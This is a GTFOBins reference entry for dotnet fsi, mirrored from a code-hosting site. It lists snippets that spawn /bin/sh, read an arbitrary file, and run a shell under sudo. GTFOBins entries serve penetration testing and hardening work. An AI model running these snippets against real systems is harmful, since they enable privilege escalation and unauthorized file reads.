mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
17 lines
412 B
Markdown
17 lines
412 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- code: |
|
||
|
dotnet fsi
|
||
|
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
|
||
|
file-read:
|
||
|
- code: |
|
||
|
export LFILE=file_to_read
|
||
|
dotnet fsi
|
||
|
System.IO.File.ReadAllText(System.Environment.GetEnvironmentVariable("LFILE"));;
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo dotnet fsi
|
||
|
System.Diagnostics.Process.Start("/bin/sh").WaitForExit();;
|
||
|
---
|